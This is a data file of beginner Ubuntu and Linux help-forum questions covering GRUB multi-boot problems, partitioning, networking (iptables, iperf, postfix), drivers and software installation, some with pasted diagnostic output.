373275	number of os can be install on the harddisk	i installed ubuntu , windows 7 and windows xp , in three different partitions and after i install grub loadder , i am getting only two ( ubuntu and windows xp ) entries in the grub menu , there is no option to boot in to windows 7 . can we make three entries in grub menu for each ubuntu , windows 7 and windows xp ? sorry for the delay reply ... .. here is my result.txt content , i not found the link to attach the file that is why i copy and paste here : boot info script 0.61 [ 1 april 2012 ] ============================= boot info summary : =============================== = > grub2 ( v1.97-1.98 ) is installed in the mbr of /dev/sda and looks at sector 1 of the same hard drive for core.img . core.img is at this location and looks in partition 9 for ( , msdos9 ) /boot/grub . sda1 : __________________________________________ file system : ntfs boot sector type : windows xp : ntfs boot sector info : no errors found in the boot parameter block . operating system : windows 7 boot files : /boot.ini /grldr /bootmgr /boot/bcd /windows/system32/winload.exe /grldr /ntldr /ntdetect.com sda2 : __________________________________________ file system : ntfs boot sector type : windows xp : ntfs boot sector info : no errors found in the boot parameter block . operating system : windows xp boot files : sda3 : __________________________________________ file system : extended partition boot sector type : unknown boot sector info : sda5 : __________________________________________ file system : vfat boot sector type : fat32 boot sector info : according to the info in the boot sector , sda5 starts at sector 0 . but according to the info from fdisk , sda5 starts at sector 144761778 . operating system : boot files : sda6 : __________________________________________ file system : ntfs boot sector type : windows xp : ntfs boot sector info : according to the info in the boot sector , sda6 starts at sector 63 . operating system : boot files : sda7 : __________________________________________ file system : swap boot sector type : - boot sector info : sda8 : __________________________________________ file system : ntfs boot sector type : windows vista/7 : ntfs boot sector info : according to the info in the boot sector , sda8 starts at sector 2048 . operating system : boot files : sda9 : __________________________________________ file system : ext3 boot sector type : - boot sector info : operating system : ubuntu 10.10 boot files : /boot/grub/grub.cfg /etc/fstab /boot/grub/core.img ============================ drive/partition info : ============================= drive : sda _______________________________________ disk /dev/sda : 160.0 gb , 160041885696 bytes 255 heads , 63 sectors/track , 19457 cylinders , total 312581808 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes partition boot start sector end sector # of sectors id system /dev/sda1 * 63 102,815,999 102,815,937 7 ntfs / exfat / hpfs /dev/sda2 102,816,000 144,761,714 41,945,715 7 ntfs / exfat / hpfs /dev/sda3 144,761,776 312,580,095 167,818,320 f w95 extended ( lba ) /dev/sda5 144,761,778 186,707,429 41,945,652 7 ntfs / exfat / hpfs /dev/sda6 186,707,493 228,653,144 41,945,652 7 ntfs / exfat / hpfs /dev/sda7 228,655,104 232,652,799 3,997,696 82 linux swap / solaris /dev/sda8 232,654,848 274,597,887 41,943,040 7 ntfs / exfat / hpfs /dev/sda9 274,599,936 312,580,095 37,980,160 83 linux '' blkid '' output : ____________________________________ device uuid type label /dev/sda1 4f80ed6f4f79b298 ntfs windows 7 /dev/sda2 dacc8581cc8558a1 ntfs windows xp /dev/sda5 4226-4fe4 vfat softwares /dev/sda6 6a089a1a0899e57b ntfs jyosthna /dev/sda7 6632a4a7-470c-4def-85a7-077a3df6b0b5 swap /dev/sda8 d89a1f099a1ee432 ntfs entertainment /dev/sda9 e90f6c3b-aba9-4ba0-9eb7-e499468664e4 ext3 ================================ mount points : ================================= device mount_point type options /dev/sda1 /media/windows 7 fuseblk ( rw , nosuid , nodev , allow_other , blksize=4096 , default_permissions ) /dev/sda2 /media/windows xp fuseblk ( rw , nosuid , nodev , allow_other , blksize=4096 , default_permissions ) /dev/sda5 /media/softwares vfat ( rw , nosuid , nodev , uhelper=udisks , uid=1000 , gid=1000 , shortname=mixed , dmask=0077 , utf8=1 , showexec , flush ) /dev/sda6 /media/jyosthna fuseblk ( rw , nosuid , nodev , allow_other , blksize=4096 , default_permissions ) /dev/sda8 /media/entertainment fuseblk ( rw , nosuid , nodev , allow_other , blksize=4096 , default_permissions ) /dev/sda9 / ext3 ( rw , errors=remount-ro , commit=0 ) ================================ sda1/boot.ini : ================================ [ boot loader ] timeout=30 default=multi ( 0 ) disk ( 0 ) rdisk ( 0 ) partition ( 2 ) \windows [ operating systems ] multi ( 0 ) disk ( 0 ) rdisk ( 0 ) partition ( 2 ) \windows= '' microsoft windows xp professional '' /noexecute=optin /fastdetect =========================== sda9/boot/grub/grub.cfg : =========================== # do not edit this file # it is automatically generated by grub-mkconfig using templates from /etc/grub.d and settings from /etc/default/grub # begin /etc/grub.d/00_header if [ -s $ prefix/grubenv ] ; then set have_grubenv=true load_env fi set default= '' 0 '' if [ `` $ { prev_saved_entry } '' ] ; then set saved_entry= '' $ { prev_saved_entry } '' save_env saved_entry set prev_saved_entry= save_env prev_saved_entry set boot_once=true fi function savedefault { if [ -z `` $ { boot_once } '' ] ; then saved_entry= '' $ { chosen } '' save_env saved_entry fi } function recordfail { set recordfail=1 if [ -n `` $ { have_grubenv } '' ] ; then if [ -z `` $ { boot_once } '' ] ; then save_env recordfail ; fi ; fi } function load_video { insmod vbe insmod vga } insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos9 ) ' search -- no-floppy -- fs-uuid -- set e90f6c3b-aba9-4ba0-9eb7-e499468664e4 if loadfont /usr/share/grub/unicode.pf2 ; then set gfxmode=640x480 load_video insmod gfxterm fi terminal_output gfxterm insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos9 ) ' search -- no-floppy -- fs-uuid -- set e90f6c3b-aba9-4ba0-9eb7-e499468664e4 set locale_dir= ( $ root ) /boot/grub/locale set lang=en insmod gettext if [ `` $ { recordfail } '' = 1 ] ; then set timeout=-1 else set timeout=10 fi end /etc/grub.d/00_header begin /etc/grub.d/05_debian_theme set menu_color_normal=white/black set menu_color_highlight=black/light-gray end /etc/grub.d/05_debian_theme begin /etc/grub.d/10_linux menuentry 'ubuntu , with linux 2.6.35-22-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos9 ) ' search -- no-floppy -- fs-uuid -- set e90f6c3b-aba9-4ba0-9eb7-e499468664e4 linux /boot/vmlinuz-2.6.35-22-generic root=uuid=e90f6c3b-aba9-4ba0-9eb7-e499468664e4 ro quiet splash initrd /boot/initrd.img-2.6.35-22-generic } menuentry 'ubuntu , with linux 2.6.35-22-generic ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos9 ) ' search -- no-floppy -- fs-uuid -- set e90f6c3b-aba9-4ba0-9eb7-e499468664e4 echo 'loading linux 2.6.35-22-generic ... ' linux /boot/vmlinuz-2.6.35-22-generic root=uuid=e90f6c3b-aba9-4ba0-9eb7-e499468664e4 ro single echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-2.6.35-22-generic } end /etc/grub.d/10_linux begin /etc/grub.d/20_linux_xen end /etc/grub.d/20_linux_xen begin /etc/grub.d/20_memtest86+ menuentry `` memory test ( memtest86+ ) '' { insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos9 ) ' search -- no-floppy -- fs-uuid -- set e90f6c3b-aba9-4ba0-9eb7-e499468664e4 linux16 /boot/memtest86+.bin } menuentry `` memory test ( memtest86+ , serial console 115200 ) '' { insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos9 ) ' search -- no-floppy -- fs-uuid -- set e90f6c3b-aba9-4ba0-9eb7-e499468664e4 linux16 /boot/memtest86+.bin console=ttys0,115200n8 } end /etc/grub.d/20_memtest86+ begin /etc/grub.d/30_os-prober menuentry `` windows nt/2000/xp ( on /dev/sda1 ) '' { insmod part_msdos insmod ntfs set root= ' ( hd0 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set 4f80ed6f4f79b298 drivemap -s ( hd0 ) $ { root } chainloader +1 } end /etc/grub.d/30_os-prober begin /etc/grub.d/40_custom this file provides an easy way to add custom menu entries . simply type the menu entries you want to add after this comment . be careful not to change the 'exec tail ' line above . end /etc/grub.d/40_custom begin /etc/grub.d/41_custom if [ -f $ prefix/custom.cfg ] ; then source $ prefix/custom.cfg ; fi # # # end /etc/grub.d/41_custom # # # =============================== sda9/etc/fstab : ================================ /etc/fstab : static file system information . # use 'blkid -o value -s uuid ' to print the universally unique identifier for a device ; this may be used with uuid= as a more robust way to name devices that works even if disks are added and removed . see fstab ( 5 ) . # proc /proc proc nodev , noexec , nosuid 0 0 /dev/sda9 / ext3 errors=remount-ro 0 1 swap was on /dev/sda7 during installation uuid=6632a4a7-470c-4def-85a7-077a3df6b0b5 none swap sw 0 0 /dev/fd0 /media/floppy0 auto rw , user , noauto , exec , utf8 0 0 =================== sda9 : location of files loaded by grub : ==================== gib - gb file fragment ( s ) 148.744281769 = 159.712956416 boot/grub/core.img 1 148.774848938 = 159.745777664 boot/grub/grub.cfg 1 148.785129547 = 159.756816384 boot/initrd.img-2.6.35-22-generic 6 148.704105377 = 159.669817344 boot/vmlinuz-2.6.35-22-generic 3 148.785129547 = 159.756816384 initrd.img 6 148.704105377 = 159.669817344 vmlinuz 3 ======================== unknown mbrs/boot sectors/etc : ======================== unknown bootloader on sda3 00000000 fb 92 00 79 84 42 e2 51 d7 51 e9 12 f0 5b 49 db | ... y.b.q.q ... [ i.| 00000010 0d 3c c3 5e 0b d5 2f 5c 74 f4 00 01 6a 96 6a ca |. < .^../\t ... j.j.| 00000020 9e c0 00 be d3 fc 42 fc 7e 6d 75 8a bf f5 c0 eb | ... ... b.~mu ... ..| 00000030 d1 28 7b d4 cc cf 54 bd c5 54 57 5f e2 f0 41 26 | . ( { ... t..tw_..a & | 00000040 83 36 b1 99 29 44 00 03 40 29 0e 20 7e 81 9c 7a |.6.. ) d.. @ ) . ~..z| 00000050 89 4a 95 c9 a1 9e 67 d8 d2 c2 9a 39 96 1c 80 a1 |.j ... .g ... .9 ... .| 00000060 2c ae 62 21 ad 13 86 b3 e3 22 dd 14 ea a7 19 eb | , .b ! ... .. `` ... ... | 00000070 5e 60 8a f9 48 36 90 30 83 4d ea d2 57 c7 4f e9 |^..h6.0.m..w.o.| 00000080 f9 9f dc fc 9d a5 ad 14 b2 fb cf 5e 2f 99 8b 4e | ... ... ... ..^/..n| 00000090 f6 09 46 4a ba 13 e7 54 c0 e8 06 a0 d3 9f f3 f4 |..fj ... t ... ... ..| 000000a0 a1 00 00 08 0c 08 4e 61 0b 99 20 88 53 24 a5 5e | ... ... na.. .s $ .^| 000000b0 1a aa c1 e9 63 11 f7 e5 f8 95 c0 76 5d 01 79 d8 | ... .c ... ... v ] .y.| 000000c0 f8 ea e1 e4 80 b0 e0 2b 5a 5a 07 89 c5 9a 7d f7 | ... ... .+zz ... . } .| 000000d0 14 98 c3 88 d4 3d f9 6e ab 17 bb a6 78 0b 1b 48 | ... ..=.n ... .x..h| 000000e0 34 9e fa 75 d5 9d bd 55 74 e1 a0 33 68 aa ba 94 |4..u ... ut..3h ... | 000000f0 b6 de 67 58 ab e9 d5 cd 97 67 04 cf 9c e6 56 7e |..gx ... ..g ... .v~| 00000100 6f 9d 7b 39 f3 b2 db f1 d5 9f ee 7e 18 26 7b 67 |o . { 9 ... ... .~. & { g| 00000110 67 be ff d7 9b fc cc de 65 e0 b4 b2 03 60 fa 45 |g ... ... .e ... ..e| 00000120 9b ca 07 5d f5 96 48 00 00 00 40 22 29 20 e7 20 | ... ] ..h ... @ '' ) . | 00000130 00 09 44 29 06 ad 69 4a 29 5c 79 6d 24 6e c3 91 |..d ) ..ij ) \ym $ n..| 00000140 6d 9d d7 62 07 9a 65 18 b2 f8 bb 99 c8 43 00 e3 |m..b..e ... ... c..| 00000150 86 ab 15 e3 99 18 f2 78 5a 81 11 b6 0d 9f b0 c6 | ... ... .xz ... ... .| 00000160 8c dd 6d 7e af bb a6 3a 85 a9 a6 09 f9 ff c5 6e |..m~ ... : ... ... .n| 00000170 e7 2c 29 a3 3c ac 88 e8 c5 9b ed 40 b7 ff e5 82 |. , ) . < ... ... @ ... .| 00000180 68 f2 c7 d5 9c f5 76 6b bd 93 19 fb ff f6 78 d1 |h ... ..vk ... ... x.| 00000190 37 ff 87 1e 7d 2f ef 5a dc b0 36 8b a1 f0 18 3e |7 ... } /.z..6 ... . > | 000001a0 f8 ff fb 90 00 80 00 04 2d 4a d8 1e 61 80 00 88 | ... ... ..-j..a ... | 000001b0 87 fa f3 cc 3c 00 0a f9 0d 6a fc 94 00 01 00 01 | ... . < ... .j ... ... | 000001c0 c1 ff 07 fe ff ff 02 00 00 00 34 0a 80 02 00 fe | ... ... ... .4 ... ..| 000001d0 ff ff 05 fe ff ff 36 0a 80 02 73 0a 80 02 00 00 | ... ... 6 ... s ... ..| 000001e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ... ... ... ... ... .| 000001f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 aa | ... ... ... ... ..u.| 00000200
373277	uncompress nexus 7 image	so i unlocked my nexus 7 , the installer is n't working so i 'm trying to factory restore the device . my problem is uncompressing the factory file ( https : //wiki.ubuntu.com/nexus7/installation ) i run the comand in terminal and it gives me this ... tar ( child ) : nakasi-jdq39-factory-c317339e.tgz : can not open : no such file or directory tar ( child ) : error is not recoverable : exiting now tar : child returned status 2 tar : error is not recoverable : exiting now what am i doing wrong ? can i just manually add the file to the proper directory ? no idea where it is . please walk me through it , i 'm still fairly new to ubuntu .
373282	fixed channel that hops	i 'm getting a fixed channel that is hopping instead of a wpa handshake i 've stop the -1 error but still getting a fixed channel thats hops
373283	quad boot , windows 7,8 , ubuntu , kali linux , partitioning scheme questions , which boot manager ? , please help , lots of questions ! thnx	dear ubuntu community , i have a question about how to partition my ssd in the new ultrabook i received . please help me out so i can get started as soon as possible . ( sorry for bad english ) . my situation right now ; win8.1 uefi boot , kali linux only bootable when i change settings in bios to legacy . 256gb splitted in a few recovery partitions , boot partition , win8 , swap and kali linux ( ext4 ) partitionn . a my plan is to install 4 operating systems ; win7 , win8.1 , ubuntu , and kali linux ( debian ) . i want to be able to start up any one of the operating systems with one bootloader , either grub or maybe some alternative bootloader ( refind bootloader ? someone told me thats good for this kind of situations ) my strategy is to first format the ssd and start from scratch . i will set my bios to `` legacy first '' since there is no legacy only option . after that i i will first install win7 , after that win 8.1 ( will it install as non-uefi when i have bios set to legacy first ? i hope so.. ) when win8.1 is installed , i will install either kali linux firs ( debian ) or ubuntu first , and after that i will install the other one , so i will end up with ; win7 win8 , kali and 8.1 . my questions ; what kind of partition scheme do you guys recommend ? ( i mean about the primary/extended/active kind of thing . i dont really know what all these terms mean , and i want to do everything right the first time around . i think i will use gparted to set up my partitioning . the partition sizes are as follow ; win7 : 40gb ntfs win8 : 60gb ntfs kali : linux : 25gbext4 ? ubuntu : 25gb ext4 ? data partition : 100gb . this partition will be used by win7 and win8 , so i guess it will be ntfs , right ? i can store data from my linux partitions as well to this disk , correct ? or is it not advised to store linux data to a drive used by windows ? are there any extra partitions that i am missing ? boot partition , for windows maybe ? what about swap , i got 8gb of ram , and will not use hibernation , so is it recommended ? or not really necessary ? what would you guys recommend me to do ? how should i let gparted partition my ssd before installing everything ? please be as detailed as possible . is the order i will install my os 's in correct ? will the uefi windows 8.1 thing be any problem ? remember ; i have brand new laptop , with uefi enabled , and only `` legacy first boot '' option , in bios , and i want to be able to load all 4 os 's from one bootloader , without going into bios . ( i have 8gb ram , so i dont know if i really need a swap partition ? well , i think these are all questions i can think of right now , i hope your answers will be enough to start as soon as possible . i have already made a backup of the laptop as is , so now its just waiting for your information before i can go on ! thank you for participating in this great community . it has learned me allot already ! thanks ! ! bent
373284	how do you change which monitor displays the grub login screen ?	i have my computer plugged into my monitor and my big screen tv through hdmi , whenever i boot it wants to show the grub2 bootloader on the tv and not on the monitor , this hurts my neck .. lmao ... the only way i have found to remedy this is to unplug the tv when i boot ... not really a solution though cause then i am plugging and unplugging cables all the time ... if you know a way to remedy this please answer . i am trying to make a very clear question as i have been searching for an answer to this problem and have yet to find a remedy . please give me a clear and simple solution to this problem and thanks for reading and posting : )
373285	why did reccomended boot-repair fail ?	the recommended repair failed for computer . i have questions regarding how to use the iso disk to help fix the problem . note : reasons i am doing boot-repair because grub was installed on my usb drive . i dual boot with windows 8 . the link to boot-repairs upload is http : //paste.ubuntu.com/6385594 i have two hard drives . my c : has my windows and d : is designated to ubuntu
373287	keep track of password in ubuntu	is there a keychain-like program included with ubuntu ? or is there something i can sudo apt-get ? i really liked dashlane on osx . what 's the best software available that can keep track of passwords for websites , and also hold important information regarding logins ? ssh addresses , things like that ?
373288	how to run mupen 64 in a 6gb pen drive	i have an old acer aspire 7110 laptop , and it has no hard-drive . i am planning on running ubuntu in a ! 6 gb pen drive , as i have done with other linux distros . but , my question is : will i be able to run mupen 64 ? i know it exists , i 'm just wondering about graphics drivers . i know linux works differently to windows , but how do i use 3d acceleration ? the chip-set is a `` intel 940gml express '' , and it has a `` intel graphics media accelerator 950 '' video card thing . i might not be able to connect this laptop to the internet , as the wifi module has been taken out , and the ethernet port seems to be lose . does ubuntu auto download dependencies ?
373289	problem installing 12.04 -- retriving files	i 've been following the instructions by `` how-to-geeks '' to install 12.04 on my hp dv7 . everything was going ok up to the point right before the end of the install . at the bottom of my new screen it was saying retrieving files . it was retrieving the files and then stopped . why it would do that ? what should i do to finish the install ?
373291	ubuntu 13.04 wo n't boot past splash screen	i 've been running ubuntu 13.04 for a while now , and everything has been running fine , but now it wo n't boot past the splash screen . i was using it , shut it down , and when i turned it back on , it would go from the splash screen to a black screen with a cursor at the top left . i ran the boot repair program on the recommended settings and it still does n't boot after restart .
373292	change directory , subdirectory , folder and file permissions in ubuntu gui	i am having problems installing , upgrading and deleting wordpress plugins on my vm-virtual box lamp server . i have read that the issue has something to do with permissions that are assigned in my var/www/wp-content folder . i am a windows user and rather new to ubuntu terminal . i am finding that so many so called `` experts '' here provide all sorts of code in order to fix this problem in the terminal , however , when i follow those commands in the terminal i seem to do more harm than good to my ubuntu instillation and the wordpress problem is not being resolved ( and it also seems a lot of others encounter similar issues ) . question how i can bulk change directory , folder and file permissions in ubuntu using the gui . ( it can be done quite easily in windows gui surely ubuntu has a similar option )
373294	usb parallel ( lpt ) and serial ( com ) emulation	well , i 'm trying to use a usb printer with a windows program in wine that uses only parallel and serial ports to print . so i have to emulate parallel or serial ports to use the usb printer . i have it installed as a cups printer and it works fine , in wine works too , but i want to be recognized as a parallel or serial port . i googled a lot and i did n't find a real answer , as i 'm like new to this os . i use ubuntu 13.10 and a laptop hp computer , no serial or parallel ports , only usb . thanks in advance ! : d
373298	ubuntu 13.10 wireless internet connection stopped working after update	my laptop has stopped being able to access the internet which i think is caused by an update i installed yesterday . any help would be greatly appreciated .
373305	sector boundary	for the first time i 've installed ubuntu and i 'm a real newbie to this thing . before i had installed ubuntu i had windows 7 and was my intention to have both systems running . when i installed ubuntu from usb i was asked to define a partition to ubuntu i define 32 gb to ubuntu and the remaining for windows 7 - because i was lacking a bit on space due to larges amounts of files already in windows directories . the first installation try there was a problem . an installation fatal error . so i tried it again . second time , there was already an ubuntu installed . so i install it over the one already exists because i could n't boot either from windows 7 or ubuntu . this time there was no need to define partition space . now i ca n't boot windows ( where all my work is ) and from what i understand , the 400 and something gb gone from windows partition . i do n't see also the partition that comes from factory to boot the laptop to factory settings . i do n't intend to use it , but even if i wanted to , i do n't see it there . sorry for my poor english and thanks in advance . this command i 've learned it 30 minutes ago from this forum . sudo fdisk -l /dev/sda disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x00092e69 device boot start end blocks id system /dev/sda1 * 2048 968466431 484232192 83 linux /dev/sda2 968468478 976771071 4151297 5 extended partition 2 does not start on physical sector boundary . /dev/sda5 968468480 976771071 4151296 82 linux swap / solaris
373306	ubuntu 12.04 dark screen all the times ( not just during installation )	i know that there have been lots of question about ubuntu dark screen , but mine is really different . i have been running ubuntu without problem , but recently sometimes the screen is really dark ( but not totally dark since i can still see stuff ) after waking up from suspend . previously i just need to do a hard reboot and things are fine , but now even that does n't help . i tried to boot into bios ( hitting thinkpad 's thinkvantage key ) to change power management , but even the bios screen is dark . i tried to boot into grub ( hitting shift during start up ) , can see nothing either . what should i do ?
373308	how do i move ubuntu to my unallocated free space in the installer in order to run ubuntu with windows 7 ?	i have partitioned out space for ubuntu and can not seem to figure out how to install ubuntu on to the unallocated space . i have never done this before so i do n't know much . i have looked up you tube videos on how to install it but they all have a run alongside windows 7 option in the installer . mine does not .
373310	unix mail ( command line ) - view mail in reverse order	i installed mailutils in order to read some internally generated status messages . is there any way to have them show the most recent at the top of the page , instead of at the bottom ? i searched around for some flags that i could pass the mail command , but have n't found any . i do n't even know if this command is even used anymore .
373311	installation of ubuntu 12.04	i tried to install ubuntu 12.04 without success . i followed all the suggestions listed regarding taking care of the integrity of the data and the proper way to burn the ubuntu iso . all cases end with an image out of sync that makes it impossible to continue the installation . any idea about what is the cause ?
373319	foraward traffic from local machine to proxy server using iptables	i am using ubuntu server 12.04 . my ip is 192.168.4.160 . i want to route the http traffic generated locally from my system destined to a particular url ( say x.x.x.x ) to pass through proxy server . my proxy server is 192.168.0.13:3128 . i added following rule in iptables sudo iptables -t nat -a output -p tcp -d x.x.x.x -- dport 80 -j dnat -- to 192.168.0.13:3128 however , this rule does not seem to work for me . i captured packet in wireshark and i saw that packet is still going to x.x.x.x i am not very much familiar with iptables , so please try to be specific . thanks in advance
373322	how to replace avconv with ( the real ) ffmpeg and have it work right ?	anyone know how to install the real , current ffmpeg ( not the older version by avconv that comes w/ ubuntu ) without having the problems mentioned here ? reasons : everything works ( or so many have written ) , use the new syntax , and after some research -- and without getting into the controversy -- i simply believe the packagers made a mistake going with avconv . this is a fix . apparently it 's not as easy as it should be due to versioning conflicts , and that avconv and ffmpeg ca n't coexist on the same machine ( noted in the accepted answer of the above-linked post ) . though at least one guide mentions installing ffmpeg locally ( ~ ) to achieve coexistence . my release is precise 12.04.3 lts , but it appears this would apply to newer ones also .
373324	send email from postfix server to outside email client	i have set up an email server and can send/receive email localhost and i can receive mail from outside sources but i can not send emails to outside sources . i get this error when i try to send to an outside source such as live.com or gmail.com : nov 8 22:15:13 server2 postfix/smtp [ 7598 ] : 699d480a64 : to= < myemailaddress @ live.com > , relay=none , delay=122043 , delays=122022/0.01/20/0 , dsn=4.4.3 , status=deferred ( host or domain name not found . name service error for name=live.com type=mx : host not found , try again ) any ideas that where can i resolve this ?
373326	how to congest a link using iperf	i have setup like below . switch1 -- -- -- -- -- -- -- -- -- -- switch2 | | | | | | | | | | | | pc1 pc2 pc3 pc4 i have a video traffic is flowing between pc1 and pc4 . i have configured pc2 as iperf server . ( iperf -s ) and pc3 as client . ( iperf -c 10.10.10.2 -p 20 -t 10000 ) where 10.10.10.2 is pc2 ip . now i am seeing most of the traffic in a link ( switch1 -- -switch2 ) is iperf . ( tcp ) . i have observed from the logs that 1 out of 300 packet is udp . still i am not seeing any difference in the quality of video streaming in pc4 . it looks similar compared to the case with no iperf . i am checking qos , i have tried many options with iperf , couldnt succeed . i want to diminish the quality of video streaming in pc4 . could you please tell me what options can be used along with iperf to do it . bandwidth between switch1 -- -switch2 is 1gbits/sec . thanks in advance
373330	unity theme corrupted	i 'm using ubuntu 13.10 . i have got a bug with my ubuntu ambiance theme as seen on the picture . it caused many menus , buttons with gray color squares . how can i restore it .
373331	problems with installing grub ?	it is a dual boot with windows 8. the link is paste.ubuntu.com/6385594 i have two hard drives . my c : has my windows and d : is designated to ubuntu . i have to use my usb drive in order to get grub . boot-repair tells me to make a disk . i am not sure what to do with the disk once i have made it ? thanks .
373333	dolby sound effect	i am using a laptop with dolby advanced audio support . i was using windows 7 before installing ubuntu 13.10 . i could feel dolby sound effect while using km player . i can not feel dolby effect in neither totem or vlc in ubuntu . can any one recommend me media player available in ubuntu which supports dolby advanced audio .
373335	does ubuntu include software or application of gantt chart	does ubuntu include software or application of gantt chart /table of task management and project management ?
373336	where does youtube dl downloads youtube files ?	i am running 12.04 ubuntu os , i have downloaded the app and the download to is complete but when i search from dash neither is the file nor the folder of youtube dl turns up . can anyone help ?
373340	ubuntu server 13.10 ca n't mount hard drive that is on my router	so i am working currently with my ubuntu server which i have it on my laptop at the moment so i can test out how to work with the server os . i have it up and running with samba , openssh , webmin , and plexmedia server . my problem is that i ca n't seem to get the server to get to the router hard drive . i have a tp-link wdr3500 . the format of the hard drive is a fat32 . what i 've tried : install cifs . sudo vi /etc/fstab type out \\ \tplinklogin.net\volume1 \mnt\media cifs guest 0 0 i have also tried out \\\192.168.0.1\volume1 \mnt\media cifs guest 0 0 but then when i go to terminal and do sudo mount -a , i usually get a error saying wrong fs type , bad option , bad superblock on //ipaddress/dns/volume1 , missing codepage or helper program , or other error . but in dmesg it will say unable to determine destination address . so am i doing something wrong here ? i ca n't install the hard drive on to my laptop since my family is constantly using it to transfer data back and forth on it and they get mad at me if i just take it away .
373343	tuxonice didnt work after updating ubuntu 12.04 core to 3.2.0-56	i just want to share . i updated my ubuntu 12.04 core to 3.2.0-56 yesterday from update manager . i found some problems after that like tuxonice application did n't work anymore . i also found all application had missing the top bar ( the title bar ) so i couldnt use mouse to minimize , restore or close the applications . it back to normal again after i removed the update by using synaptic . may be the updates still have problem . i use ubuntu 12.04 32-bit with gnome theme .
373344	ca n't connect to wifi on ubuntu 13.04 . no wireless extension	i recently installed ubuntu 13.04 on my laptop . i ca n't connect to my wireless network because none of the available wireless networks are being displayed when i check the network connections . i have tried everything i found on the net . i 've been at it for about ten hours . the issue i think i have is solving this : iwconfig eth0 no wireless extensions . lo no wireless extensions . what do i do now ?
373347	i ca n't install ubuntu 13.04	i downloaded ubuntu 13.04 and burned to a disk . but when i install it , the system is restarting . i am new to linux and i do n't know how to make partitions . what are root and home partitions and how to make partitions ?
373348	how to set my virtual box display for red hat linux to 1366x768	i have installed red hat linux on my virtual box and i ca n't set the display of vm to 1366x768 . the display option in red hat linux shows only 1024x768 , 800x600 , 400x600 .
373352	can not install ubuntu 13.04 using wubi	i get the following error when trying to install 13.04 using wubi attributeerror : 'nonetype ' object has no attribute 'get_info' please help the log file is here - > http : //pastebin.com/nufvcqwp
373353	i have a problem in installing software	while installing software from ubuntu software center it showed failed to get repository information , check internet connection .what is it how to resolve the problem .
373355	find records which contain a string starting and ending with certain characters	i need a command ( preferably using awk ) which lists the unique roll number and names of all students whose names starts with a and ends with k from the following list : 001 abhishek physics 90 002 rohan maths 100 003 simashree chemistry 89 002 rohan language 80 005 vamsi computers 99 001 abhishek maths 95 006 surjya computers 93
373356	help , what does ignoring file name 'untitled document 1 ' in a directory when installing java mean ?	i am trying to install java on ubuntu 13.10 and i keep getting this error ... '' ignoring file 'untitled document 1 ' in directory '/etc/apt/sources.list.d/ ' as it has no filename extension '' all i want to do is install java so i can play pogo games on my laptop . i have google chrome , chromimium , and firefox . can anybody help me , please install java on my laptop . i am new to ubuntu , so i would need help on what commands , etc to do , for a newbie , lol ! thanks so much ! : )
373359	ubuntu software center 13.10 getting games problem	in the software center after clicking buy and logging into ubuntu sso , it says processing your request for ... and information received . after that is says oops ! something broke while generating the page . please try again in a few minutes , and if the problem persists file a bug or contact customer support . please quote oops-id oops-0b67265c11939657964e828d9c984ce5 it does it for everything i try to download .
373362	need help to upgrade to newest ubuntu version	i am trying to upgrade to the the latest ubuntu program and i have tried the `` upgrade '' but my computer says it can not upgrade . i am new to this and totally lost . how do i do this upgrade to the newest version of ubuntu ?
373363	eclipse adt : layout properties editor does n't work correctly	i have a new , clean installation of eclipse kepler ( 4.3.1 ) sr1 ( x64 ) in linux mint 15 olivia x64 ( based on ubuntu 13.04 âraring ringtailâ ) . adt version is 22.3.0 , and java is oracle 's 1.7.0_45 . the problem is , i can not edit the properties in layout editor ; nothing happens when i click `` ... '' button , nor i can edit the properties directly by clicking the empty space . the boolean properties do n't even contain the checkbox . this does n't happen in windows xp 32bit , with the same versions of eclipse and adt : anyone know any workarounds/reasons for this ? looks like mac os x mountain lion had a similar issue in the past , but i heard that was fixed , and i 'm talking about linux version here . i had no such problems in eclipse indigo and an old version of adt , but i ca n't remember the exact versions of them . edit : lubuntu 13.04 ( 32bit ) in vmware player does n't have this problem .
373367	how to install downloaded canon scangear	i have newly installed ubuntu 12.04 . i have canon mg6360 printer/scanner . i have successfully installed printer drivers and can print okay . have downloaded mg6300 series scangear mp ver . 2.00 for linux ( deb ) from canon but do n't know how to install this from terminal . i apologise for having to ask such a basic question ! thanks . later ... i have extracted the files . question appears : do i want to run install.sh ? i click 'run in terminal ' , and enter password . i do n't know if it installed and do n't know how to check . scanner does not work or 'see ' the pc . any advice would be greatly appreciated .
373370	installing group of fonts in ubuntu	how to install group of fonts in a folder in ubuntu ? there are many font folders and i do n't where to copy my fonts cause i want to use them in whole linux environment not in a special program ? what i mean is : is it necessary to copy fonts in a folder or not ? what 's the difference copy in fonts folder and a folder in fonts folder ? and i do not have permission to access fonts folder such as copy , paste and ... .
373372	how to read the all files in a directory and display them using cat command ?	i have a directory employer/ . in this there are 5 .txt files . i want to combine the data from all 5 files and show into the command prompt using cat or create another file and save the result in that file . how can i do this ?
373373	downgrade ubunutu from 12.04.3 to 12.04.2	how do i downgrade ubuntu from 12.04.3 to 12.04.2 . i am doing this because having issues with my graphics drivers and screen goes blank some times . seems like downgrading 12.04.3 to 12.04.2 & xserver is a solution to this problem . xorg.0.log file : http : //pastebin.com/c3igdpbi i tried below command did n't work though.. ! : ( sudo apt-get purge linux-generic-lts-raring xserver-xorg-lts-raring it showed below package not installed. ! then i tried to manually install using below command , sudo apt-get install -- install-recommends linux-generic-lts-quantal xserver-xorg-lts-quantal libgl1-mesa-glx-lts-quantal it showed - its already installed & to the latest version . so , is there any other way to downgrade ? thanks , deena
